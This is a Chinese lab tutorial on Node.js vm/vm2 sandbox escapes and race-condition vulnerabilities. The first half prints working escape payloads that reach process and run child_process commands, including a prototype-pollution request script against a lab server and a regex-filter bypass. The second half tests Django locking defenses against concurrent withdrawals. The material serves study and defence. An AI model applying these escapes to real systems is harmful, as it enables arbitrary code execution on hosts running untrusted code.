JS沙箱繞過以及競(jìng)爭(zhēng)條件型漏洞復(fù)現(xiàn)
一、沙箱繞過
1.概念
沙箱繞過"是指攻擊者利用各種方法和技術(shù)來規(guī)避或繞過應(yīng)用程序或系統(tǒng)中的沙箱(sandbox)。沙箱是一種安全機(jī)制,用于隔離和限制應(yīng)用程序的執(zhí)行環(huán)境,從而防止惡意代碼對(duì)系統(tǒng)造成損害。它常被用于隔離不受信任的代碼,以防止其訪問敏感數(shù)據(jù)或?qū)ο到y(tǒng)進(jìn)行未授權(quán)的操作。
當(dāng)攻擊者成功繞過沙箱時(shí),他們可以在受影響的系統(tǒng)上執(zhí)行惡意代碼,并且有可能獲取敏感信息、傳播惡意軟件、執(zhí)行拒絕服務(wù)攻擊或利用系統(tǒng)漏洞等。
2.例題分析
2.1vm模塊例題1(利用上下文對(duì)象或this指向)
先說一下最簡(jiǎn)單的vm模塊,vm模塊是Node.JS內(nèi)置的一個(gè)模塊。理論上不能叫沙箱,他只是Node.JS提供給使用者的一個(gè)隔離環(huán)境。
示例
const vm = require('vm');
const script = `...`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)其實(shí)逃逸出沙箱就一種方法,就是拿到沙箱外部的變量或?qū)ο?,然后?toString方法和.constructor 屬性來獲取Function這個(gè)屬性,然后拿到process,之后就可以執(zhí)行任意代碼了
這道例題可以直接拿this,因?yàn)檫@里沒有方法使用了this,此時(shí)this指向global,構(gòu)造如下payload
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()this.toString.constructor就是Function這個(gè)方法,然后利用Function返回process對(duì)象
然后調(diào)用子模塊執(zhí)行命令,成功繞過沙箱
這里可能會(huì)有疑問,為什么不用m、n來獲取Function呢,m、n變量都是在外部定義的啊
這個(gè)原因就是因?yàn)閜rimitive types,數(shù)字、字符串、布爾等這些都是primitive types,他們的傳遞其實(shí)傳遞的是值而不是引用,所以在沙盒內(nèi)雖然你也是使用的m,但是這個(gè)m和外部那個(gè)m已經(jīng)不是一個(gè)m了,所以也是無法利用的,但是如果修改成{m: [], n: {}, x: /regexp/},這樣m、n、x就都可以利用了。
最終用nodejs執(zhí)行下面的代碼
const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)成功執(zhí)行

2.2vm模塊例題2(利用toString屬性)
const vm = require('vm');
const script = `...`;
const sandbox = Object.create(null);
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log('Hello ' + res) 這道例題的this指向就變?yōu)閚ull了,無法獲取Function屬性,上下文中也沒有其他對(duì)象
此時(shí)我們可以借助arguments對(duì)象。arguments是在函數(shù)執(zhí)行的時(shí)候存在的一個(gè)變量,我們可以通過arguments.callee.caller獲得調(diào)用這個(gè)函數(shù)的調(diào)用者。
arguments.callee是遞歸調(diào)用自身,.caller是一個(gè)指向調(diào)用當(dāng)前函數(shù)的函數(shù)的引用。它提供了一種查找調(diào)用棧的方式,可以追溯到調(diào)用當(dāng)前函數(shù)的函數(shù)。所以我們可以使用此方法來獲取Function。
那么如果我們?cè)谏澈兄卸x一個(gè)函數(shù)并返回,在沙盒外這個(gè)函數(shù)被調(diào)用,那么此時(shí)的arguments.callee.caller就是沙盒外的這個(gè)調(diào)用者,我們?cè)偻ㄟ^這個(gè)調(diào)用者拿到它的constructor等屬性,就可以繞過沙箱了。
構(gòu)造如下payload
(() => {
const a = {}
a.toString = function () {
const cc = arguments.callee.caller;
const p = (cc.constructor.constructor('return process'))();
return p.mainModule.require('child_process').execSync('whoami').toString()
}
return a })()這道題的巧妙之處就在于最后的console.log('Hello ' + res),此時(shí)res不是字符串,而當(dāng)一個(gè)字符串與另一個(gè)非字符串結(jié)合時(shí),會(huì)把res轉(zhuǎn)為字符串,相當(dāng)于res.toString,此時(shí)就調(diào)用了我們payload里面的函數(shù),執(zhí)行了命令
如果沒有最后的console.log('Hello ' + res)這一句代碼呢,我們還可以使用Proxy來劫持所有屬性,只要沙箱外獲取了屬性,我們?nèi)匀豢梢杂脕韴?zhí)行惡意代碼,這里就不演示了

2.3vm2模塊例題1(觸發(fā)調(diào)用棧溢出異常)
但前兩個(gè)例題主要說的是vm模塊,vm本不是一個(gè)嚴(yán)格沙箱,只是隔離環(huán)境而已。而vm2是一個(gè)正經(jīng)沙箱,難度相較于vm大得多
這道例題是用觸發(fā)外部異常的方式來繞過的,但是vm2版本必須是在3.6.10之前
這個(gè)方法有趣的地方就在于,他是想辦法在沙箱外的代碼中觸發(fā)一個(gè)異常,并在沙箱內(nèi)捕捉,這樣就可以獲得一個(gè)外部變量e,再利用這個(gè)變量e的constructor執(zhí)行代碼。
而觸發(fā)異常的方法就是“爆調(diào)用棧”,JavaScript在遞歸超過一定次數(shù)時(shí)就會(huì)拋出異常。
但我們需要保證的是:拋出異常的這個(gè)函數(shù)是在host作用域中(即沙箱外)。在js執(zhí)行到1001次時(shí),調(diào)用棧溢出,此時(shí)就會(huì)報(bào)錯(cuò)
"use strict";
const {VM} = require('vm2');
const untrusted = `
const f = Buffer.prototype.write;
const ft = {
length: 10,
utf8Write(){
}
}
function r(i){
var x = 0;
try{
x = r(i);
}catch(e){}
if(typeof(x)!=='number')
return x;
if(x!==i)
return x+1;
try{
f.call(ft);
}catch(e){
return e;
}
return null;
}
var i=1;
while(1){
try{
i=r(i).constructor.constructor("return process")();
break;
}catch(x){
i++;
}
}
i.mainModule.require("child_process").execSync("whoami").toString()
`;
try{
console.log(new VM().run(untrusted));
}catch(x){
console.log(x);
}但是好像v8引擎遞歸的默認(rèn)限制是10000次,等了10多分鐘也沒有反應(yīng)

因此沒有去復(fù)現(xiàn)這個(gè)例題
2.4vm2模塊例題(原型鏈污染+import動(dòng)態(tài)導(dǎo)入)
const express = require('express');
const app = express();
const { VM } = require('vm2');
app.use(express.json());
const backdoor = function () {
try {
console.log(new VM().run({}.shellcode));
} catch (e) {
console.log(e);
}
}
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
for (var attr in b) {
if (isObject(a[attr]) && isObject(b[attr])) {
merge(a[attr], b[attr]);
} else {
a[attr] = b[attr];
}
}
return a
}
const clone = (a) => {
return merge({}, a);
}
app.get('/', function (req, res) {
res.send("POST some json shit to /. no source code and try to find source code");
});
app.post('/', function (req, res) {
try {
console.log(req.body)
var body = JSON.parse(JSON.stringify(req.body));
var copybody = clone(body)
if (copybody.shit) {
backdoor()
}
res.send("post shit ok")
}catch(e){
res.send("is it shit ?")
console.log(e)
}
})
app.listen(3000, function () {
console.log('start listening on port 3000');
});之前講過原型鏈污染,在這里就不贅述了
首先通過代碼審計(jì)發(fā)現(xiàn)merge、clone方法,那么大概率存在原型鏈污染,再看if條件,需要copybody有shit屬性,且為真才能進(jìn)入backdoor()方法,再看backdoor()方法
const backdoor = function () {
try {
new VM().run({}.shellcode);
} catch (e) {
console.log(e);
}
}分析new VM().run({}.shellcode),需要{}有shellcode屬性,我們可以污染原型鏈來使空對(duì)象有shellcode屬性,然后還需要逃逸出沙箱,這里沒有上下文對(duì)象,我們可以使用動(dòng)態(tài)導(dǎo)入元素的方法來繞過沙箱,構(gòu)造以下payload
{"shit": "1", "__proto__": {"shellcode": "let res = import('./app.js')
res.toString.constructor(\"return this\")
().process.mainModule.require(\"child_process\").execSync('whoami').toString();"}}用Python發(fā)送post請(qǐng)求
import requests
import json
url="http://192.168.239.138:3000/"
headers={"Content-type":"application/json"}
data={"shit": "1", "__proto__": {"shellcode": "let res = import('./app.js')\n res.toString.constructor(\"return this\")\n ().process.mainModule.require(\"child_process\").execSync('whoami').toString();"}}
req=requests.post(url=url,headers=headers,data=json.dumps(data))
print(req.text)最后成功復(fù)現(xiàn)(之前報(bào)錯(cuò)是因?yàn)闆]有寫打印語句)

2.5vm2模塊例題(正則繞過)
這道例題由于代碼不全,無法復(fù)現(xiàn),但是可以分析
const { VM } = require('vm2');
function safeEval(calc) {
if (calc.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '')) {
return null;
}
return new VM().run(calc);
}首先if判斷,如果輸入的calc參數(shù)沒有匹配上這個(gè)正則,那if條件就會(huì)判為真,返回null,如果匹配上了這個(gè)正則,那就會(huì)被替換為空,if條件就會(huì)判為假,最終return new VM().run(calc),所以我們需要匹配上這個(gè)正則才行
這個(gè)正則可以分三部分
- 第一部分是必須有Math這個(gè)關(guān)鍵字,最后的?代表0次或者1次,所以Math.xxx和Math是都可以匹配上的
- 第二部分是匹配了
+、-、*、/、&、|、^、%、<、>、=、,、?、:這些符號(hào) - 第三部分是匹配了整數(shù)或者浮點(diǎn)數(shù),比如3.14,也可以使用科學(xué)計(jì)數(shù)法,比如3.9e3
這個(gè)正則可以說過濾得比較嚴(yán)格,但是我們也可以繞過
((Math)=>(Math=Math.constructor,Math.constructor(Math.fromCharCode({gen(c)}))))(Math+1)()分析這個(gè)代碼,首先正則肯定可以匹配上這段代碼

接下來我們?cè)俜治鰹槭裁磿?huì)這樣寫
它創(chuàng)建了一個(gè)方法,形參Math,方法的內(nèi)容是先將Math.constructor賦值給Math,然后調(diào)用Math.constructor方法,內(nèi)容是Math.fromCharCode({gen(c)}),我們可以先不看gen(c),那么這個(gè).fromCharCode方法有什么用呢?

這個(gè)方法可以將字符的ascii碼轉(zhuǎn)換為字符,這樣我們就可以繞過它的正則
最后傳參Math+1,這也可以被正則匹配上,那為什么要傳這個(gè)參數(shù)呢
因?yàn)镸ath+1返回的是一個(gè)字符串,而字符串的constructor屬性是toString方法,而toString方法的構(gòu)造函數(shù)就是Function,最后的()立即執(zhí)行。
然后便可以找到vm2對(duì)應(yīng)版本的payload,和正則繞過結(jié)合,便可以成功實(shí)現(xiàn)繞過
二、競(jìng)爭(zhēng)型漏洞
1.概念
競(jìng)爭(zhēng)條件型漏洞(Race Condition Vulnerability)是一種安全漏洞,它發(fā)生在多個(gè)進(jìn)程或線程競(jìng)爭(zhēng)訪問共享資源時(shí)的情況下。這種漏洞出現(xiàn)的根本原因是并發(fā)操作的不正確管理,導(dǎo)致了不可預(yù)料的結(jié)果。
簡(jiǎn)單來說,競(jìng)爭(zhēng)條件型漏洞可能在以下情況下出現(xiàn):
- 多個(gè)進(jìn)程或線程在訪問共享資源(如文件、內(nèi)存、數(shù)據(jù)庫(kù)等)時(shí)沒有進(jìn)行合適的同步控制。
- 這些進(jìn)程或線程之間的執(zhí)行順序無法預(yù)測(cè),因此可能會(huì)導(dǎo)致數(shù)據(jù)的不一致或程序行為異常。
2.環(huán)境搭建
這里我們使用ubuntu和Python3來復(fù)現(xiàn)漏洞,項(xiàng)目代碼在文章上方,解壓后cd進(jìn)入目錄
注意這里還需要其他依賴環(huán)境,以下是需要使用pip3安裝的包,官方源下載速度慢,可以更換國(guó)內(nèi)源,我這里用的是阿里云的
root@localhost:~# vim /etc/pip.conf [global] index-url = https://mirrors.aliyun.com/pypi/simple/ [install] trusted-host=mirrors.aliyun.com
djangopytzpython-dotenvdj-database-urlpsycopg2-binarygunicorngeventdjango-bootstrap5waitress
一切準(zhǔn)備就緒后,首先使用migrate生成數(shù)據(jù)庫(kù)表,其次創(chuàng)建超級(jí)用戶,這樣我們才能登錄后臺(tái)(后臺(tái)地址/admin),最后使用collectstatic命令生成前端代碼
python3 manage.py migrate python3 manage.py createsuperuser python3 manage.py collectstatic
然后進(jìn)入templates目錄,vim form.html,修改form表單的enctype屬性為"multipart/form-data"

最后的最后使用下面的命令啟動(dòng)服務(wù),端口號(hào)和ip可以自己更改,如果出現(xiàn)報(bào)錯(cuò),大概率是因?yàn)槎丝诒徽加没蛘邲]有cd切換到對(duì)應(yīng)項(xiàng)目目錄下
gunicorn -w 2 -k gevent -b 0.0.0.0:8088 race_condition_playground.wsgi
啟動(dòng)成功后就可以開始我們的實(shí)驗(yàn)了
3.復(fù)現(xiàn)過程
3.1無鎖無事務(wù)的競(jìng)爭(zhēng)攻擊
ucenter1是沒有任何防御的,無鎖無事務(wù) vim /app/ucenter/view.py

這里的css渲染沒有成功,不知道什么原因,重試了很多次依然沒用,但是不影響我們的操作
首先進(jìn)入后臺(tái),點(diǎn)擊user

然后點(diǎn)擊超級(jí)用戶名

然后在money這里添加你想要的錢數(shù)

然后save保存,之后訪問/ucenter/1,如果錢數(shù)正常就說明設(shè)置成功了

之后填入100,用bp抓包,抓包成功后復(fù)制粘貼到Y(jié)akit下,然后選擇并發(fā)配置,刪除不必要的字段

然后點(diǎn)擊發(fā)送請(qǐng)求,這里我第一次失敗了,第二次再發(fā)送就成功了

這時(shí)我們到后臺(tái)去看看

發(fā)現(xiàn)有兩次取款100記錄,然而我們的存款只有100,這樣就成功復(fù)現(xiàn)了
3.2無鎖有事務(wù)的競(jìng)爭(zhēng)攻擊
ucenter2加上了事務(wù)

無鎖有事務(wù)也并不能防御競(jìng)爭(zhēng)攻擊,事務(wù)只是能夠?qū)崿F(xiàn)操作要么成功要么不成功,并不能鎖住我們的進(jìn)程
我們重新添加錢數(shù),抓包,和ucenter1操作一樣,這次我一次成功,結(jié)果很明顯,仍然存在競(jìng)爭(zhēng)型漏洞

我們來查看后臺(tái)

兩次記錄,復(fù)現(xiàn)成功,仍然存在競(jìng)爭(zhēng)型漏洞
3.3悲觀鎖加事務(wù)防御
ucenter3加上了悲觀鎖和事務(wù),悲觀鎖的含義是悲觀地認(rèn)為一定會(huì)有進(jìn)程來更新數(shù)據(jù),所以悲觀鎖會(huì)提前給進(jìn)程加鎖

在處理表單數(shù)據(jù)之前,也就是前端剛提交數(shù)據(jù)后,就使用select for update和主鍵pk鎖住了這個(gè)進(jìn)程,那這個(gè)時(shí)候讀操作也受到了影響。
那么我們?cè)侔l(fā)包就沒用了,那我們?cè)俅螠y(cè)試看看

只有一次302跳轉(zhuǎn),也就是說只成功取款了一次,查看后臺(tái),也只有一次記錄

但是這里有一個(gè)問題,如果有大量讀操作的場(chǎng)景下,使用悲觀鎖會(huì)有性能問題,因?yàn)槊看卧L問view,都會(huì)鎖住當(dāng)前用戶對(duì)象,此時(shí)其他用戶場(chǎng)景,比如訪問主頁(yè),也會(huì)因此卡住。
這樣我們就可以使用樂觀鎖
3.4樂觀鎖加事務(wù)防御
樂觀鎖的含義是樂觀地認(rèn)為不會(huì)有其他進(jìn)程來更新數(shù)據(jù),而只是到了需要更新數(shù)據(jù)時(shí),才會(huì)給進(jìn)程加鎖

在前端提交表單數(shù)據(jù)后,樂觀鎖并沒有立即鎖住進(jìn)程,而是在需要取款的時(shí)候使用update鎖住,這樣就不會(huì)出現(xiàn)讀操作也被禁止的問題了
我們來測(cè)試看看,并沒有出現(xiàn)競(jìng)爭(zhēng)漏洞,只有一條302記錄

查看后臺(tái),仍然只有一條記錄

通過這個(gè)實(shí)驗(yàn),我們便知道樂觀鎖加事務(wù)是防御競(jìng)爭(zhēng)條件漏洞的最優(yōu)解
到此這篇關(guān)于JS沙箱繞過以及競(jìng)爭(zhēng)條件型漏洞復(fù)現(xiàn)的文章就介紹到這了,更多相關(guān)JS沙箱繞過內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
JavaScript 報(bào)表展示實(shí)現(xiàn)代碼
以下是從網(wǎng)上找到的一段JavaScript實(shí)現(xiàn)圖形報(bào)表的代碼,對(duì)于想客戶端顯示報(bào)表的朋友可以參考下。2009-12-12
淺談JavaScript中定義變量時(shí)有無var聲明的區(qū)別
這篇文章主要介紹了JavaScript中定義變量時(shí)有無var聲明的區(qū)別分析以及示例分享,需要的朋友可以參考下2014-08-08
微信小程序自定義tabbar欄實(shí)現(xiàn)過程講解
tabBar相對(duì)而言用的還是比較多的,但是用起來并沒有難,下面這篇文章主要給大家介紹了關(guān)于微信小程序全局配置之tabBar的相關(guān)資料,文中通過圖文以及示例代碼介紹的非常詳細(xì),需要的朋友可以參考下2023-02-02
JavaScript+CSS無限極分類效果完整實(shí)現(xiàn)方法
這篇文章主要介紹了JavaScript+CSS無限極分類效果完整實(shí)現(xiàn)方法,涉及JavaScript針對(duì)頁(yè)面元素節(jié)點(diǎn)遍歷與動(dòng)態(tài)操作技巧,需要的朋友可以參考下2015-12-12
前端JavaScript實(shí)現(xiàn)本地模糊搜索功能的方法實(shí)例
對(duì)于模糊查詢,一般都是傳關(guān)鍵字給后端,由后端來做。但是有時(shí)候一些輕量級(jí)的列表前端來做可以減少ajax請(qǐng)求,在一定程度上提高用戶體驗(yàn),這篇文章主要給大家介紹了關(guān)于前端JavaScript如何實(shí)現(xiàn)本地模糊搜索功能的相關(guān)資料,需要的朋友可以參考下2021-07-07
iframe里使用JavaScript控制主頁(yè)轉(zhuǎn)向的方法
這篇文章主要介紹了iframe里使用JavaScript控制主頁(yè)轉(zhuǎn)向的方法,涉及使用javascript實(shí)現(xiàn)iframe頁(yè)面跳轉(zhuǎn)的技巧,需要的朋友可以參考下2015-04-04

